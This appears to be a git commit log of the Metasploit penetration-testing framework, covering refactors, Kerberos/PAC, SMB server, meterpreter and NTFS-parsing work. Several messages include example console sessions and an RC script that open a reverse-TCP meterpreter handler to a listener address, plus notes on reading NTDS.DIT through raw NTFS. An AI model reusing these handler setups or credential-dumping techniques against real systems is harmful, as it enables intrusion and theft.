Brent Cook
1869977921
Land #4962 : OJ adjusts MSF to new metsrv needs
...
bump meterpreter bins to 0.0.17
2015-03-23 17:18:06 -05:00
jvazquez-r7
d8d4c23d60
JMX code refactoring
2015-03-23 17:06:51 -05:00
David Maloney
60966f3d2a
handle a blank response body
...
sometimes the response body itself can be blank
so we need to handle that properly.
MSP-9972
2015-03-23 16:03:30 -05:00
jvazquez-r7
962bb670de
Remove old JMX mixin
2015-03-23 15:48:10 -05:00
OJ
9c9d333a1b
Create verify ssl mixin, adjust some formatting
2015-03-23 13:21:08 +10:00
HD Moore
bc3c73e408
Merge branch 'master' into feature/registered-payload-uuids
2015-03-22 18:51:13 -05:00
HD Moore
0d1fe37710
Ignore non-base64url characters during decode
2015-03-22 16:16:47 -05:00
HD Moore
94241b2998
First attempt at rewiring HTTP handlers to use UUIDs
2015-03-21 03:15:08 -05:00
sinn3r
97b919923e
Fix undefined esize in Rex::Exploitation::Egghunter
...
esize is not a valid variable, and we don't need it either.
2015-03-20 21:32:46 -05:00
HD Moore
858d9b1e7a
Introduce Rex::Text.(en|de)code_base64url and use it for uri_checksum
2015-03-20 21:32:08 -05:00
OJ
9d20d057dd
Update Meterpreter URL length to 512
2015-03-20 13:16:43 +10:00
oj@buffered.io
fd4ad9bd2e
Rework changes on top of HD's PR
...
This commit removes duplication, tidies up a couple of things and puts
some common code into the x509 module.
2015-03-20 13:06:57 +10:00
OJ
7ca91b2eb5
Add support for ssl to the patcher
2015-03-20 12:52:38 +10:00
OJ
a9f74383d0
Update patch to support both ascii and wchar
2015-03-20 12:52:18 +10:00
OJ
acd802c5fd
Initial work for WinHTTP comms support in Meterpreter
2015-03-20 12:51:47 +10:00
Brent Cook
564962042e
Land #4925 , OJ adds self-contained windows meterpreter options
2015-03-19 21:07:32 -05:00
Brent Cook
24ce0118b8
reenable UTF filtering support where needed
...
revert d22231bdc8
2015-03-19 16:02:21 -05:00
jvazquez-r7
ec90594f7e
Add support for Rex::Java::Serialization::ProxyClassDesc
2015-03-19 15:41:24 -05:00
OJ
a582e05b6d
Merge gemfile changes in master
2015-03-20 06:29:38 +10:00
OJ
040ef1e3e9
Land #4950 : ls unicode and sorting in meterpreter
2015-03-20 06:28:29 +10:00
jvazquez-r7
5c3134a616
Add first support to gather information from RMI registries
2015-03-19 11:16:04 -05:00
OJ
7899881416
Update POSIX bins from master
2015-03-19 14:50:14 +10:00
HD Moore
ae621c83c5
Add a URL-safe base64 encoder/decoder
2015-03-18 17:03:29 -05:00
Brent Cook
c774038fe6
improve ls output by providing various new options
2015-03-18 16:02:03 -05:00
David Maloney
4293af01b1
make sure we strip leading whitespace
...
in the aforementiond record_request_and_response method
we need to still make sure to strip leading whitespace
from the front of our data before saving it
MSP-9972
2015-03-18 11:23:45 -05:00
David Maloney
dacaa9e82b
simplify request-response parsing in apsscan
...
the record_request_and_response method for the
nokogiri appscan parser was way overcomplicated
it was trying to do way too much trickiness
when the data could be very simply split and consumed
MSP-9972
2015-03-18 11:19:00 -05:00
David Maloney
3269817b29
remove bad truthiness checks
...
truthy checks were used here, but you'll get
an empty hash which will be treated as true causing
the test to be invalid and allowing for errors further in the method
MSP-9972
2015-03-18 10:52:24 -05:00
HD Moore
8d3cb8bde5
Fix up meterpreter patching arguments and names
2015-03-18 01:25:42 -05:00
HD Moore
390a704cc7
Cleanup proxyhost/proxyport arguments to match new names
2015-03-18 01:19:05 -05:00
jvazquez-r7
14be07a2c4
Update java_rmi_server modules
2015-03-17 21:29:52 -05:00
jvazquez-r7
6315e07312
Add specs for UniqueIdentifier
2015-03-17 20:38:43 -05:00
jvazquez-r7
87b777e923
Refactor moving code to rex
2015-03-17 17:15:32 -05:00
Brent Cook
d22231bdc8
remove unicode_filter_encode calls
...
Let the underlying utf8 messages through to the console.
2015-03-17 11:07:07 -05:00
HD Moore
11593800b6
Move X509 PEM parsing into Rex::Parser::X509Certificate
2015-03-14 15:52:23 -05:00
Brent Cook
74ee2d8408
Land #4916 , @hmoore-r7 annotate Interlock Target param as 'in' only
2015-03-13 08:59:59 -05:00
OJ
1338a55b0d
Adjust error handling for extension enumeration
...
Make the catch case more generic for when the target doesn't support the
command for extension enumeration. This supports more than just windows
now.
2015-03-13 21:49:45 +10:00
William Vu
fa2fbc387c
Land #4922 , REG_MULTI_SZ for type2str
2015-03-13 01:07:27 -05:00
James Lee
14a5efce58
Add yardoc
2015-03-13 01:04:23 -05:00
HD Moore
f676dc03c8
Lands #4849 , prevents the target from running out of memory during NTFS reads
2015-03-12 00:01:47 -05:00
HD Moore
7252ba284a
Tweak memory usage from 64Mb to 4Mb
2015-03-11 23:58:13 -05:00
HD Moore
aa79b71e35
Fixes #4897 by corrected kernel32!Interlocked function definitions
2015-03-11 23:26:32 -05:00
OJ
345b5cc8e1
Add stageless meterpreter support
...
This commit adds plumbing which allows for the creation of stageless
meterpreter payloads that include extensions. The included transprots at
this point are bind_tcp, reverse_tcp and reverse_https, all x86.
More coming for x64. Will also validate http soon.
2015-03-12 13:22:04 +10:00
James Lee
cd5699dc39
Sort cases and add specs
2015-03-08 23:27:32 -05:00
James Lee
0440e19cc1
Add REG_MULTI_SZ
2015-03-08 22:48:24 -05:00
jvazquez-r7
1c064f6b46
Land #3074 , @0x41414141 SMB Share mixin
2015-03-04 10:16:04 -06:00
jvazquez-r7
64fd818364
Land #4411 , @bcook-r7's support for direct, atomic registry key access in meterpreter
2015-03-04 10:01:33 -06:00
jvazquez-r7
cdf5fec474
Fix style
2015-03-04 09:57:39 -06:00
jvazquez-r7
8328c5c5e9
Add specs for SMB_FIND_FILE_BOTH_DIRECTORY_INFO requests
2015-03-03 12:43:41 -06:00
jvazquez-r7
eb3aedf4a7
Define constants for WordCount in responses
2015-02-28 18:15:14 -06:00
jvazquez-r7
89a033c194
Delete unnecessary paddings due to miscalculations
2015-02-26 15:54:00 -06:00
Bazin Danil
3aa68c30b0
=> not => !
2015-02-26 21:31:01 +01:00
Bazin Danil
a427e417a3
-consomation +consumption
2015-02-26 21:23:09 +01:00
William Vu
0a51ca12a5
Download all of every file implicitly
2015-02-26 14:10:53 -06:00
William Vu
d0ca1b2dc6
Delete a thing I added for no reason
2015-02-26 14:06:10 -06:00
William Vu
5996256ccc
Fix formatting
2015-02-26 14:05:50 -06:00
jvazquez-r7
c73ffea1b9
Do minor cleanup
2015-02-26 12:50:45 -06:00
jvazquez-r7
970f0c94b2
Create CREATE_ANDX constants
2015-02-26 10:44:07 -06:00
Matthew Hall
ab1bb0e50d
bugfixes to https://github.com/jvazquez-r7/metasploit-framework/tree/review_3074_clean_server
...
to provide consistent support for various exploits and OS SMB Commands.
Reintroduces smb_cmd_trans_query_path_info_network for use with the Struts2 JSP injection vulnerability.
Reintroduces smb_cmd_trans_query_file_info_basic for common use with rundll32.
Corrects some issues with filename formatting and pattern matching for file requests (can still be improved).
2015-02-26 16:10:34 +00:00
William Vu
ed9213eb4c
Add fsquery check to fs{download,delete} methods
2015-02-25 17:37:20 -06:00
William Vu
ea5b6f66d4
Add UEL to fsdownload method
2015-02-25 17:35:34 -06:00
William Vu
5d3c7f3b4a
Add fsquery method
2015-02-25 17:18:23 -06:00
William Vu
1f981dd336
Add FSQUERY constant
2015-02-25 17:00:27 -06:00
jvazquez-r7
993c75ec77
Update Offset counts with constants
2015-02-25 16:25:16 -06:00
William Vu
91f0713056
Add fsdelete method
2015-02-25 15:41:40 -06:00
William Vu
a096a17e21
Add FSDELETE constant
2015-02-25 15:39:51 -06:00
William Vu
80d8491d09
Add fsdownload method
2015-02-25 15:00:31 -06:00
William Vu
e8c2c3687d
Replace "pathname" with "path"
...
This always bothered me, since I usually say "path."
2015-02-25 15:00:18 -06:00
William Vu
02ea7a0282
Add FSDOWNLOAD constant
2015-02-25 15:00:11 -06:00
jvazquez-r7
df50aa0f06
Use constants for DataCount and DataCountTotal
2015-02-25 14:11:38 -06:00
jvazquez-r7
f21959a8a2
Add constants for session setup actions
2015-02-25 13:31:57 -06:00
jvazquez-r7
e967cfbfb3
Create Access rights constants
2015-02-25 13:22:16 -06:00
jvazquez-r7
1caffbea2d
Add constants for Negotiation Capabilities
2015-02-25 12:50:33 -06:00
jvazquez-r7
50d50d5353
Define constants for SMB Flags
2015-02-25 12:28:25 -06:00
jvazquez-r7
e5d9bb0a47
Update from master
2015-02-25 11:37:13 -06:00
jvazquez-r7
ec9be4531b
Add SMB_CREATE_ANDX_RES_PKT template
2015-02-25 11:33:08 -06:00
jvazquez-r7
d10385cfed
Add template for SMB_TREE_CONN_ANDX_RES_PKT
2015-02-24 19:27:25 -06:00
jvazquez-r7
642765aeb5
Delete comments
2015-02-24 18:27:02 -06:00
jvazquez-r7
bb36899699
Do templates names consistent
2015-02-24 18:26:46 -06:00
jvazquez-r7
d29e9fc20b
Parse TRAN2_FIND_FIRST2 commands
2015-02-24 17:02:49 -06:00
William Vu
5f0aeda0be
Land #4835 , new hex format for msfvenom
2015-02-24 10:56:47 -06:00
Christian Mehlmauer
5880702552
added new hex format
2015-02-24 16:05:02 +01:00
Brent Cook
ab4a416958
comment out duplicate keys that can only be used for reference
...
ruby is ignoring all but the second instances, and 2.2 still throws a
warning
2015-02-24 08:50:02 -06:00
William Vu
5eec07d4d1
Fix duplicate hash key "jpeg"
...
In lib/rex/proto/http/server.rb.
2015-02-24 05:19:42 -06:00
jvazquez-r7
ea483f14a1
Try to fix logic for query information levels
2015-02-23 17:17:33 -06:00
jvazquez-r7
3fca26a5de
Add support for SMB_COM_TRANSACTION2 data blocks and params
2015-02-23 16:37:39 -06:00
jvazquez-r7
a06d07d6da
Clean smb_cmd_trans2_query_file_information dispatching
2015-02-23 12:03:08 -06:00
jvazquez-r7
3d7381b62a
Handle TRANS2 commands
2015-02-23 11:33:49 -06:00
HD Moore
e5e3474af4
Handle ICMP "protocol not available" errors as connection errors
2015-02-22 16:36:53 -06:00
BAZIN-HSC
d8132f86ff
ajust buffer size
2015-02-22 08:51:16 +01:00
sinn3r
85871ab822
Fix #4382 , Make errors more meaningful
...
Fix #4382
2015-02-20 20:09:58 -06:00
jvazquez-r7
52a0e6dd1c
Mark a couple of handlers for later review
2015-02-20 16:28:04 -06:00
BAZIN-HSC
0d53dc1d13
use a buffer to avoid memory use on victims machine
...
use a buffer to avoid memory use on victims machine
use attacker memory to store files
avoid bugs on large files
2015-02-20 20:02:09 +01:00
jvazquez-r7
a91d19e0e7
Add template for SMB_QUERY_FILE_STANDARD_INFO
2015-02-20 10:58:15 -06:00
jvazquez-r7
21978a1bfe
Add template for SMB_QUERY_FILE_BASIC_INFO
2015-02-20 10:40:45 -06:00
jvazquez-r7
cf63e09188
Add templates for SMB_FIND_FILE_FULL_DIRECTORY_INFO_HDR and SMB_FIND_FILE_NAMES_INFO_HDR
2015-02-20 09:17:51 -06:00
BAZIN-HSC
fe75a31a59
NTFS parser optimisation
...
NTFS Parser does not gather automaticaly non resident attribute
that were not necessary
Railgun is called 17 times instead of 32 on an examples on ntds.dit
2015-02-20 13:11:53 +01:00
jvazquez-r7
f2405a5dc0
Create SMB_FIND_FILE_BOTH_DIRECTORY_INFO_HDR_LENGTH constant
2015-02-20 00:35:26 -06:00
jvazquez-r7
571dffa317
Create template for SMB_FIND_FILE_BOTH_DIRECTORY_INFO
2015-02-20 00:22:33 -06:00
jvazquez-r7
94ad64546c
Create TRANS2_PARAMETERS template
2015-02-19 23:16:52 -06:00
jvazquez-r7
b24b94ddd3
Do first cleanup of find_first2 handlers
2015-02-19 19:08:56 -06:00
jvazquez-r7
874031b96d
Delete require
2015-02-18 13:44:31 -06:00
jvazquez-r7
415c671416
Move Rex code, we'll redesign as mixin
2015-02-18 13:44:02 -06:00
jvazquez-r7
f960a77754
Solve merging conflicts
2015-02-18 11:36:47 -06:00
Matthew Hall
934af4cee9
Merge branch 'master' into module-smbfileserver
2015-02-17 17:01:44 +00:00
Matthew Hall
49971a6bc3
Add two more contants and handlers seen during testing.
2015-02-17 16:48:11 +00:00
sinn3r
0597d2defb
Land #4560 , Massive Java RMI update
2015-02-17 10:07:07 -06:00
Brent Cook
b4cf2f5d8c
use correct response filter TLV_TYPE_VALUE_NAME
2015-02-17 08:46:25 -06:00
Matthew Hall
1f6aebe3df
Move to using constant values.
...
This commit adds several constants for TRANS2, QUERY_PATH_INFO, MAX_DATA_COUNT,
and NT2 FLAG2 Bits to smb/constants.rb, which have then been utilised in smb/server.rb
to reduce the use of magic values.
2015-02-17 14:31:31 +00:00
Brent Cook
8f74f8eeed
pass down the new permissions parameters
2015-02-17 06:11:20 -06:00
Brent Cook
503f58375b
add direct registry access methods
...
Rather than operating on a passed-in HKEY, these open and close the registry
key directly for each operation.
This pattern better reflects the actual API usage within msf, and removes extra
round-trips to open and close the registry key, reducing traffic and increasing
performance. I did not add direct versions of every registry operation.
There was no benefit for more rarely-used operations, other than requiring more
churn in the meterpreters.
The primary beneficiary of this is post exploitation modules that do registry
or service enumeration. See #3693 for test cases.
2015-02-17 06:11:20 -06:00
Matthew Hall
3110c7b40f
Adds smb_cmd_trans_find_first2_full to respond to "Find File Full Directory Info" FIND_FIRST2 requests,
...
as seen when using "type \\ip\share\file".
2015-02-17 11:37:44 +00:00
sinn3r
50c72125a4
::Errno::EINVAL, disable obfuscation, revoke ms14-064
2015-02-12 11:54:01 -06:00
sinn3r
22811257db
Fix #4711 - Errno::EINVA (getpeername(2)) BrowserAutoPwn Fix
...
This patch fixes #4711 .
The problem here is that the browser sometimes will shutdown some of our
exploit's connections (in my testing, all Java), and that will cause Ruby
to call a rb_sys_fail with "getpeername(2)". The error goes all the
way to Rex::IO::StreamServer's monitor_listener method, which triggers a
"break" to quit monitoring. And then this causes another chain of reactions
that eventually forces BrowserAutoPwn to quit completely (while the
JavaScript on the browser is still running)
2015-02-10 18:28:02 -06:00
Meatballs
33560a2657
Refactor Msf::Exploit::Powershell to Rex::Powershell to allow for
...
msfvenom usage.
2015-02-10 20:53:46 +00:00
jvazquez-r7
1f4fdb5d18
Update from master
2015-02-10 10:47:17 -06:00
Meatballs
133ae4cd04
Land #4679 , Windows Post Gather File from raw NTFS.
2015-02-08 18:50:50 +00:00
Bazin Danil
8cefe637df
bug with testing Win2k8 correction
2015-02-08 17:28:33 +01:00
Meatballs
358ab2590e
Small tidyup
2015-02-07 11:35:47 +00:00
Bazin Danil
970c5d115a
spellcheck
2015-02-05 22:08:39 +01:00
HD Moore
ffe0e52cb6
The iax2 stack now works properly with asterisk 1.8
...
Note that the requirecalltoken=no setting is still required in the asterisk configuration at this point.
2015-02-02 22:29:13 -06:00
HD Moore
0ba34422d5
Pass the debugging option for IAX2 Client
2015-02-02 21:08:16 -06:00
Bazin Danil
fbb85c0391
using string concatenation for performence
2015-01-31 05:13:44 +01:00
Bazin Danil
d9c64397fd
shorter the line, using more variables
2015-01-31 04:32:32 +01:00
Bazin Danil
0fce908045
add constant class
2015-01-31 04:19:27 +01:00
Bazin Danil
f4ec6bdc78
- use non-native pack/unpack directives
...
- coding: binary
- use constant for data_attribute
2015-01-31 03:59:23 +01:00
Bazin Danil
68b735dbda
Add a NTFS parser and a post module to dump files
...
This commit add a draft of an NTFS Parser and a post module
to gather file using the raw NTFS device (\\.\C:)
bypassing restriction like already open file with lock
Can be used to retreive file like NTDS.DIT without volume shadow copy
2015-01-30 19:16:44 +01:00
Meatballs
02864b4401
Railgun DWORD handling
2015-01-30 11:20:03 +00:00
William Vu
aec0067d14
Land #4673 , screenshot -v hardcoded false fix
2015-01-29 19:40:15 -06:00
sinn3r
823c75908d
Fix #4672 - Fix Hardcoded false for screenshot -v
...
Fix #4672
2015-01-29 16:54:41 -06:00
Brent Cook
212aeb9106
Improve utility of meterpreter file upload command
...
Rather than assume that the destination argument is a directory, check
first, and then do the same thing that 'cp' would do.
- If dest exists and is a directory, copy to the directory.
- If dest exists and is a file, copy over the file.
- If dest does not exist and is a directory, fail.
- If dest does not exist and is a file, create the file.
2015-01-29 13:45:15 -06:00
James Lee
bb17d75425
Replace direct class comparison with kind_of?
2015-01-28 17:00:15 -06:00
Brent Cook
65d71a5e18
Fix #4625 Reenable channel receive packet requeueing logic
...
In #4475 , I incorrectly interpreted the role of the 'incomplete' array
in monitor_socket, and that change should be reverted.
What appears to happen is, we play a kind of 3-card monty with the list
of received packets that are waiting for a handler to use them.
monitor_socket continually loops between putting the packets on @pqueue,
then into backlog[] to sort them, then into incomplete[] to list all of
the packets that did not have handlers, finally back into @pqueue again.
If packets don't continually get shuffled back into incomplete, they are
not copied back into @pqueue to get rescanned again.
The only reason anything should really get into incomplete[] is if we
receive a packet, but there is nothing to handle it. This scenario
sounds like a bug, but it is exactly what happens with the Tcp Client
channel - one can open a new channel, and receive a response packet back
from the channel before the subsequent read_once code runs to register a
handler to actually process it. This would be akin to your OS
speculatively accepting data on a TCP socket with no listener, then when
you open the socket for the first time, its already there.
While it would be nice if the handlers were setup before the data was
sent back, rather than relying on a handler being registered some time
between connect and PacketTimeout, this needs to get in now to stop the
bleeding. The original meterpreter crash issue from #4475 appears to be
gone as well.
2015-01-23 08:50:37 -06:00
jvazquez-r7
4311226840
Add documentation for Rex::Java::Serialization::Builder
2015-01-20 11:26:52 -06:00
jvazquez-r7
0584ae8177
Add Rex::Java::Serialization::Builder#new_object
2015-01-20 10:31:37 -06:00
jvazquez-r7
6ca86256cf
Add Rex::Java::Serialization::Builder#new_array
2015-01-20 10:23:09 -06:00
jvazquez-r7
ec57387821
Add Rex::Java::Serialization::Builder#new_class
2015-01-19 11:54:12 -06:00
jvazquez-r7
4220a5e60f
Use Rex::Java::Serialization::Builder#new_class
2015-01-19 11:53:53 -06:00
William Vu
cb0257bec7
Land #4576 , OpenVAS database import fix
2015-01-18 00:45:36 -06:00
nstarke
55a746eeb7
Changing code to catch everything extraneous
2015-01-17 15:46:26 +00:00
jvazquez-r7
697e4fbd41
Land #4584 , @sgabe's fix for egghunter searchforward
2015-01-16 19:36:52 -06:00
jvazquez-r7
a42b095472
Delete heaponly option
2015-01-16 19:35:57 -06:00
jvazquez-r7
859a8978e7
Allow searchforward to be an string
2015-01-16 19:33:19 -06:00
sgabe
3297d198f3
Fix search-forward option in regular egghunter
2015-01-16 22:16:30 +01:00
sgabe
95eab85df4
Add support for heap-only search in regular egghunter
2015-01-13 21:31:13 +01:00
Jon Hart
5cc7d5d1a8
Remove errant pry
2015-01-13 10:35:05 -08:00
jvazquez-r7
0babde8c1a
Fix specs
2015-01-13 10:48:23 -06:00
jvazquez-r7
4351964290
Change module filename
2015-01-13 10:46:14 -06:00
jvazquez-r7
3946b95bc3
Update rex code and specs
2015-01-13 10:45:00 -06:00
jvazquez-r7
1f0b986bf1
Change filenames
2015-01-13 10:43:27 -06:00
Jon Hart
69f03f5c5d
Move ACPP default port into Rex
2015-01-12 19:43:57 -08:00
Jon Hart
d5cdfe73ed
Big style cleanup
2015-01-12 19:11:14 -08:00
nstarke
9baae6e494
Potential Fix For OpenVAS DB Import Issue
2015-01-13 02:46:13 +00:00
Jon Hart
ec506af8ea
Make ACPP login work
2015-01-12 14:01:23 -08:00
Jon Hart
691ed2cf14
More cleanup
...
Don't validate checksums by default until they are better understood
Handle the unknowns a bit better
Make checksum failures more obvious why it failed
2015-01-12 13:08:12 -08:00
Jon Hart
97f5cbdf08
Add initial Airport ACPP login scanner
2015-01-12 13:08:12 -08:00
Jon Hart
fba6945e9a
Doc payload oddness. Add more checksum tests
2015-01-12 13:08:12 -08:00
Jon Hart
54eab4ea3d
Checksum validation, more tests
2015-01-12 13:08:12 -08:00
Jon Hart
7e4dd4e55b
Add ACPP decoding capabilities
2015-01-12 13:08:12 -08:00
Jon Hart
2af82ac987
Some preliminary Apple Airport admin protocol (ACPP?) support
2015-01-12 13:08:11 -08:00
jvazquez-r7
d59805568e
Do first module refactoring try
2015-01-07 19:06:09 -06:00
jvazquez-r7
731c2f99d1
Handle better java references
2015-01-07 15:19:28 -06:00
Meatballs
0b0ac1455a
Merge remote-tracking branch 'upstream/master' into extapi_service_post
...
Conflicts:
test/modules/post/test/services.rb
2015-01-07 20:53:34 +00:00
jvazquez-r7
ba13e9d64c
Add Stream spec
2015-01-07 12:05:44 -06:00
jvazquez-r7
98ec08ae0d
Add support for Ping and PingAck
2015-01-06 15:18:55 -06:00
jvazquez-r7
1e3b24f01b
Add support for DbgAck
2015-01-06 15:00:17 -06:00
jvazquez-r7
6d1d300e72
Add support for ReturnData
2015-01-06 12:52:00 -06:00
jvazquez-r7
825e08f5ac
Add support for Call messages
2015-01-06 12:36:06 -06:00
jvazquez-r7
f3ff42dbfb
Add support for Continuation
2015-01-06 11:34:47 -06:00
William Vu
0bece137c1
Land #4494 , Object.class.to_s fix
2015-01-06 02:27:35 -06:00
jvazquez-r7
757f95a24d
Add support for ProtocolAck
2015-01-06 00:14:14 -06:00
jvazquez-r7
26da73ffb8
Change class name
2015-01-05 19:23:07 -06:00
jvazquez-r7
d5dfd75e71
Add initial model and support to OutputStream
2015-01-05 18:52:13 -06:00
Meatballs
dd5c638ab0
Merge remote-tracking branch 'upstream/master' into extapi_service_post
2015-01-05 22:18:44 +00:00
OJ
17ff546b0f
Remove unnecessary calls to expand path
...
When using the Meterpreter Binaries gem to locate the path to the
meterpreter DLLs, it's not necessary to use File.expand_path on
the result because the gem's code does this already.
This commit simple removes those unnecessary calls.
2015-01-03 08:30:26 +10:00
sinn3r
d45cdd61aa
Resolve #4507 - respond_to? + send = evil
...
Since Ruby 2.1, the respond_to? method is more strict because it does
not check protected methods. So when you use send(), clearly you're
ignoring this type of access control. The patch is meant to preserve
this behavior to avoid potential breakage.
Resolve #4507
2015-01-02 13:29:17 -06:00
Christian Mehlmauer
4f11dc009a
fixes #4490 , class.to_s should not be used for checks
2014-12-31 10:46:24 +01:00
jvazquez-r7
722f86f361
Try to guess TMPDIR folder
2014-12-30 18:39:29 -06:00
jvazquez-r7
7596d211e9
Use length for comparision
2014-12-30 18:39:18 -06:00
jvazquez-r7
e903044fd5
Allow to provide writable dir
2014-12-30 18:36:30 -06:00
jvazquez-r7
f17a7e8a61
Better handling of the unix domain socket argument
2014-12-30 18:36:28 -06:00
jvazquez-r7
4df4e8b9d6
Add support for linux meterpreter migration
2014-12-30 18:34:24 -06:00
jvazquez-r7
56df2d0062
Add support for linux meterpreter migrate types
2014-12-30 18:30:15 -06:00
Tod Beardsley
135faeee29
Land #4095 , specs for Rex::OLE
2014-12-30 14:25:09 -06:00
Tod Beardsley
a8e907d68b
Land #4479 , nil comparisons and missing DLLs
...
Also fixes #4474 .
2014-12-30 13:55:54 -06:00
Brent Cook
bdac5db695
remove usage of ==/!= nil
...
Adjust all module-loading libraries to have consistent nil?/!nil? checking and
'if' style.
2014-12-30 10:59:49 -06:00
Jon Hart
d727ac5367
Alias Rex::Ui::Text::Output::Tee print_raw to write, fixes #4469 and #4363
2014-12-29 16:47:04 -08:00
sinn3r
555713b6ae
Land #4456 - MS14-068, Kerberos Checksum (plus krb protocol support)
2014-12-29 16:09:28 -06:00
Brent Cook
5d70b837ed
handle nil results from MeterpreterBinaries.path
...
When a meterpreter binary cannot be found, give the user some hint about what
went wrong.
```
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.43.1
lhost => 192.168.43.1
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.43.1:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.43.252
[*] Meterpreter session 1 opened (192.168.43.1:4444 -> 192.168.43.252:49297) at 2014-12-29 12:32:37 -0600
meterpreter > use mack
Loading extension mack...
[-] Failed to load extension: No module of the name ext_server_mack.x86.dll found
```
This is also useful for not scaring away would-be developers who replaced only
half (the wrong half) of their DLLs from a fresh meterpreter build and
everything exploded. Not that thats ever happened to me :)
2014-12-29 12:34:02 -06:00
Tod Beardsley
72eb8e6503
Land #4475 , inverted timeout fix
2014-12-29 11:37:28 -06:00
Brent Cook
bbb41c39b8
fix backward meterpreter packet timeout logic
...
The current logic times out every packet almost immediately, making it possible
for almost any non-trivial meterpreter session to receive duplicate packets.
This causes problems especially with any interactions that involve passing
resource handles or pointers back and forth between MSF and meterpreter, since
meterpreter can be told to operate on freed pointers, double-closes, etc.
This probably fixes tons of heisenbugs, including #3798 .
To reproduce this, I enabled all debug messages in meterpreter to slow it
down, then ran this RC script with a reverse TCP meterpreter, after linking in
the test modules:
(cd modules/post
ln -s ../../test/modules/post/test)
die.rc:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.1
exploit -j
sleep 5
use post/test/services
set SESSION 1
run
2014-12-29 08:15:51 -06:00
jvazquez-r7
d148848d31
Support Kerberos error codes
2014-12-24 18:05:48 -06:00
jvazquez-r7
05a9ec05e8
raise NotImplementedError
2014-12-23 19:59:37 -06:00
jvazquez-r7
4493b3285c
Raise NoMethodError for methods designed to be overriden
2014-12-23 19:51:41 -06:00
jvazquez-r7
fee033d6df
Use Rex::Text.md5_raw
2014-12-23 19:30:23 -06:00
Matthew Hall
3c10b04673
add start of rspec tests
2014-12-23 16:35:27 +00:00
Matthew Hall
fca0484639
fix a few bugs with the code cleanup
2014-12-23 15:28:00 +00:00
Matthew Hall
6b98a7d444
Tidy up by removing some duplicate code; add framework to track payload requests through the file id
2014-12-23 14:14:06 +00:00
Meatballs
b41e259252
Move it to a common method
2014-12-23 11:16:07 +00:00
jvazquez-r7
13ec578d1a
Revert "Back to Create OpenSSL::BN from string"
...
This reverts commit 635a54ca94
.
2014-12-22 23:17:03 -06:00
jvazquez-r7
635a54ca94
Revert "Create OpenSSL::BN from string"
...
This reverts commit fe99b65a62
.
2014-12-22 19:14:07 -06:00
jvazquez-r7
fe99b65a62
Create OpenSSL::BN from string
2014-12-22 18:44:47 -06:00
jvazquez-r7
d12b43d257
Use Intege.new
2014-12-22 18:37:07 -06:00
jvazquez-r7
ad97457a39
Move more constants to Crypto
2014-12-22 15:27:16 -06:00
jvazquez-r7
75a2846377
Add more PAC constants
2014-12-22 15:14:46 -06:00
jvazquez-r7
5a6c915123
Clean options
2014-12-22 14:37:37 -06:00
jvazquez-r7
ff208002d7
Reorganize the Crypto mixin
2014-12-22 11:57:35 -06:00
jvazquez-r7
9f1403a63e
Add initial specs for Msf::Kerberos::Client::TgsResponse
2014-12-20 20:29:00 -06:00
jvazquez-r7
5f0c3ebb2b
Add documentation for Msf::Kerberos::Client::TgsResponse and TgsRequest
2014-12-20 19:32:38 -06:00
jvazquez-r7
e35218b6f1
Add documentation for Msf::Kerberos::Client::CacheCredential
2014-12-20 18:28:36 -06:00
Tod Beardsley
d3050de862
Remove references to Redmine in code
...
See #4400 . This should be all of them, except for, of course, the module
that targets Redmine itself.
Note that this also updates the README.md with more current information
as well.
2014-12-19 17:27:08 -06:00
jvazquez-r7
fad08d7fca
Add specs for Rex Kerberos client
2014-12-19 12:14:33 -06:00
jvazquez-r7
f4037b1003
Clean Kerberos Rex client code
2014-12-19 11:08:48 -06:00
jvazquez-r7
dfa92da287
Add TODO
2014-12-19 01:13:56 -06:00
jvazquez-r7
77e2d4d90d
Add documentation for the Kerberos PAC support classes
2014-12-19 01:12:14 -06:00
jvazquez-r7
fda4cd3440
Fix some Rex Kerberos model documentation
2014-12-18 19:30:12 -06:00
jvazquez-r7
c426cf32d0
Add specs for Rex::Proto::Kerberos::CredentialCache::Principal
2014-12-18 17:40:06 -06:00
jvazquez-r7
16d5ee1aae
Add documentation for the rex credential cache support
2014-12-18 17:12:58 -06:00
jvazquez-r7
7275f5a5f2
Allow Rex to load credential_cache
2014-12-18 16:32:21 -06:00
jvazquez-r7
f325d2f60e
Add support for cache credentials in the mixin
2014-12-18 16:31:46 -06:00
jvazquez-r7
0a61e108ea
Add code skeleton for credential_cache
2014-12-18 00:30:47 -06:00
jvazquez-r7
0f19f3cf2e
Add classes templates
2014-12-17 23:16:58 -06:00
jvazquez-r7
f3f6a64f02
Add some AS response methods to a mixin
2014-12-17 19:50:42 -06:00
jvazquez-r7
8e570cc19b
Initial support to send TGS-REQ
2014-12-17 18:55:30 -06:00
jvazquez-r7
594b9bcfc2
Add support for AuthorizationData
2014-12-16 23:21:13 -06:00
HD Moore
9de4137aa7
Patch UA/Proxy settings during migration, lands #3632
2014-12-16 22:21:48 -06:00
Sean Verity
1930eb1bf8
Refactors metsrv patching in reverse_http.rb
2014-12-17 10:04:43 -05:00
jvazquez-r7
2649d482fe
Add support for KRB_AP_REQ
2014-12-16 18:39:42 -06:00
jvazquez-r7
0f55a98450
Add support for Authenticator encoding
2014-12-16 17:45:54 -06:00
jvazquez-r7
dde45a7f53
Add support for Checksum encoding
2014-12-16 17:05:35 -06:00
jvazquez-r7
a93cbac7bf
Support ticket encoding
2014-12-16 16:04:13 -06:00
jvazquez-r7
ce6b53b44c
Fix attribute description
2014-12-16 11:39:04 -06:00
jvazquez-r7
a5f8b4319f
Add support to encode PAC-TYPE
2014-12-16 11:31:27 -06:00
jvazquez-r7
1721641138
Add support for PAC-LOGON-INFO
2014-12-16 09:32:47 -06:00
Sean Verity
52b3025351
Reworked to avoid extending String class on blob per hdm's rec.
2014-12-15 21:40:41 -05:00
jvazquez-r7
c1114c180a
Add support for PAC-CLIENT-INFO
2014-12-15 17:32:51 -06:00
jvazquez-r7
64a0162e3f
Add support for PAC-SERVER-CHECKSUM
2014-12-15 17:16:43 -06:00
jvazquez-r7
482c883d36
Add the parent class for pac elements
2014-12-15 17:13:52 -06:00
jvazquez-r7
2c7139b936
Add support for PAC-PRIVSRV-CHECKSUM
2014-12-15 17:13:22 -06:00
jvazquez-r7
147ff13080
Add support to decode the encryption part of as responses
